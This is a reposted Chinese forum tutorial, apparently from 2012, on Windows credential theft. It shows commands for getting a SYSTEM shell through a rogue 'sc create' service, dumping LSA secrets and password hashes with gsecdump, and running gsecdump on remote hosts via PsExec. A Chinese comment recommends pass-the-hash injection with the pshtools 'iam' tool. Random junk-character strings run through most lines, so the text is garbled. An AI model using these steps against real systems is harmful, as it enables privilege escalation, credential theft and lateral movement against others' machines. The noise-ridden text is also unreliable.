o get a DOS Prompt as NT system:
: M- M1 o. Q9 q; |* [7 x
$ B; j% a4 ?$ @8 e4 rC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
0 a% { e( ]; L% D9 G[SC] CreateService SUCCESS
5 B7 v: p6 q1 L' x- f# ^( d" u5 d- @5 t# g4 i& Q
C:\>sc start shellcmdline
1 q7 y- K/ C- Q# e! o5 {[SC] StartService FAILED 1053:8 B: }# j _! m1 G2 D9 k/ e$ I
7 j7 C/ d' K! _: M- l& B B+ GThe service did not respond to the start or control request in a timely fashion.
! S. r1 \; I5 u- G
# p9 C6 ^4 B. C8 h, ^C:\>sc delete shellcmdline n! }5 e! w6 E( j7 L
[SC] DeleteService SUCCESS
) u9 Q6 K5 l" W# j9 B4 }+ \' _- p' @2 {+ z2 v' N; `* I+ [
------------1 }6 v; W: v2 N8 Y0 @; [8 T
' \" y2 q; t3 h9 t) u& j
Then in the new DOS window:
6 R' H! n: I7 n7 j1 J% C. e
7 U; A2 Y+ c9 g/ U# YMicrosoft Windows XP [Version 5.1.2600]. v$ k3 r! l2 ^+ Q+ G& w9 _! ]
(C) Copyright 1985-2001 Microsoft Corp.
- g# ^, e( n. F# @
( i& J% S0 i: i% BC:\WINDOWS\system32>whoami1 J. F2 O. K; ?
NT AUTHORITY\SYSTEM# o3 G# y T; h# u0 I0 U4 M
5 S5 T/ h) a/ u4 T7 XC:\WINDOWS\system32>gsecdump -h/ D2 Y4 W1 W9 a& ?) P7 T3 S6 e0 q3 h
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
( Q- P* z0 \2 Z: ~6 e6 Gusage: gsecdump [options]5 m3 u1 m8 Y; P1 T |& r. |( |
7 S9 K$ }% |2 F7 F$ f) J( `/ q6 I Eoptions:
% F1 A; G( A' D: D+ K-h [ --help ] show help$ E, E- j. ~7 K$ F
-a [ --dump_all ] dump all secrets
& ~$ N; ~4 I. f% @5 M0 i6 X-l [ --dump_lsa ] dump lsa secrets2 V: k& r/ D% B/ O5 a; c# c
-w [ --dump_wireless ] dump microsoft wireless connections, a) R0 ? u2 \4 \! w
-u [ --dump_usedhashes ] dump hashes from active logon sessions
0 q2 S: D( y) J# u-s [ --dump_hashes ] dump hashes from SAM/AD8 j( ?+ U; X+ ?% O
- ^+ }1 L3 c3 LAlthough I like to use:
/ S! Z) s* M2 |; g; \0 ]" _
9 G9 Y/ J; y& p P" s2 E# w2 kPsExec v1.83 - Execute processes remotely
/ c; l- Z5 l! c* H3 G' PCopyright (C) 2001-2007 Mark Russinovich% i$ L% s; L' x1 s
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
( l3 w; x# l% _* O2 \5 N0 h& x; {$ H$ t1 y
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
7 E) w2 n" X0 T& h% C- G6 x" G: M, v+ \; J3 [9 J( S' C. S2 p
to get the hashes from active logon sessions of a remote system.
: t* n; K+ l* M' i# ~/ K3 E' K6 g% {
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.* `$ [' J% o6 y4 ~& I, w% C
; W2 R' @% R+ y4 b ?( |3 u
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
: a* J% q* P/ P3 Q) c原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]; i6 J d6 W% g, @0 o9 ^
8 v& `9 e7 V3 y" `
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。" g( T' u: S; g( r* n
|
发表于 2012-11-6 21:09:29
收藏
支持
反对